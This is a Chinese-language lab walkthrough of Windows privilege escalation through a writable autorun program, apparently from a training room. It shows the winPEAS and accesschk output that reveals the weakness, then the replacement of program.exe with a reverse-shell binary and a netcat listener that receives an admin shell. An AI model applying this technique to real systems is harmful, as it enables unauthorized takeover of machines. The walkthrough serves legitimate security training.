该漏洞与上次登录的用户权限一起运行的,所以要获取到其他权限,需要高权限用户登录。
使用winPEAS 检查系统签发的自动运行可执行文件
C:\\PrivEsc\\winPEASany.exe quiet applicationsinfo
运行结果
C:\\Users\\user\\Desktop>C:\\PrivEsc\\winPEASany.exe quiet applicationsinfo
C:\\PrivEsc\\winPEASany.exe quiet applicationsinfo
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list...
- Creating disabled users list...
- Admin users list...
WinPEAS vBETA VERSION, Please if you find any issue let me know in <https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues> by carlospolop
[+] Leyend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
[?] You can find a Windows local PE Checklist here: <https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation>
====================================(Applications Information)====================================
[+] Current Active Window Application(T1010&T1518)
Select C:\\Windows\\System32\\cmd.exe
[+] Installed Applications --Via Program Files/Uninstall registry--(T1083&T1012&T1010&T1518)
[?] Check if you can modify installed software <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software>
C:\\Program Files\\Amazon
C:\\Program Files\\Autorun Program
C:\\Program Files\\Common Files
C:\\Program Files\\DACL Service
C:\\Program Files\\desktop.ini
C:\\Program Files\\DLL Hijack Service
C:\\Program Files\\File Permissions Service
C:\\Program Files\\Insecure Registry Service
C:\\Program Files\\internet explorer
C:\\Program Files\\Uninstall Information
C:\\Program Files\\Unquoted Path Service(Users [AllAccess])
C:\\Program Files\\Windows Defender
C:\\Program Files\\Windows Defender Advanced Threat Protection
C:\\Program Files\\Windows Mail
C:\\Program Files\\Windows Media Player
C:\\Program Files\\Windows Multimedia Platform
C:\\Program Files\\windows nt
C:\\Program Files\\Windows Photo Viewer
C:\\Program Files\\Windows Portable Devices
C:\\Program Files\\Windows Security
C:\\Program Files\\Windows Sidebar
C:\\Program Files\\WindowsApps
C:\\Program Files\\WindowsPowerShell
[+] Autorun Applications(T1010)
[?] Check if you can modify other users AutoRuns binaries <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup>
Folder: C:\\Windows\\system32
File: C:\\Windows\\system32\\SecurityHealthSystray.exe
RegPath: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
=================================================================================================
Folder: C:\\Program Files\\Autorun Program
File: C:\\Program Files\\Autorun Program\\program.exe
FilePerms: Everyone [AllAccess]
RegPath: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
=================================================================================================
System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.
at System.ThrowHelper.ThrowKeyNotFoundException()
at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
at d4.ap()
[+] Scheduled Applications --Non Microsoft--(T1010)
[?] Check if you can modify other users scheduled binaries <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup>
System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233' or one of its dependencies. The system cannot find the file specified.
File name: 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233'
at dx.a()
at d4.ao()
WRN: Assembly binding logging is turned OFF.
To enable assembly bind failure logging, set the registry value [HKLM\\Software\\Microsoft\\Fusion!EnableLog] (DWORD) to 1.
Note: There is some performance penalty associated with assembly bind failure logging.
To turn this feature off, remove the registry value [HKLM\\Software\\Microsoft\\Fusion!EnableLog].
C:\\Users\\user\\Desktop>
查询的登记册中为自动运行的可执行文件:
reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
然后使用accesschk.exe来 验证每个权限:
C:\\PrivEsc\\accesschk.exe /accepteula -wvu "C:\\Program Files\\Autorun Program\\program.exe"
运行结果
C:\\Program Files\\Autorun Program\\program.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\\Administrator
FILE_ALL_ACCESS
RW BUILTIN\\Users
FILE_ALL_ACCESS
C:\\Users\\user\\Desktop>
发现"C:\Program Files\Autorun Program\program.exe"自运行,可执行且可写入
创建原始备份:
copy "C:\\Program Files\\Autorun Program\\program.exe" C:\\Temp
运行结果
C:\\Users\\user\\Desktop>copy "C:\\Program Files\\Autorun Program\\program.exe" C:\\Temp
copy "C:\\Program Files\\Autorun Program\\program.exe" C:\\Temp
1 file(s) copied.
C:\\Users\\user\\Desktop>
复制shell名为:reverse.exe 的可执行程序去覆盖可执行的自运行程序:
copy C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\Autorun Program\\program.exe" /Y
运行结果
C:\\Users\\user\\Desktop>copy C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\Autorun Program\\program.exe" /Y
copy C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\Autorun Program\\program.exe" /Y
1 file(s) copied.
C:\\Users\\user\\Desktop>
攻击机启动shell端口并进行模拟用户登录(登录的当前用户权限会反弹到shell)
rdesktop 10.10.163.80
反弹shell
root@ip-10-10-4-200:~/Desktop# nc -lvnp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.163.80 49760 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
win-qba94kb3iof\\admin
C:\\Windows\\system32>
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
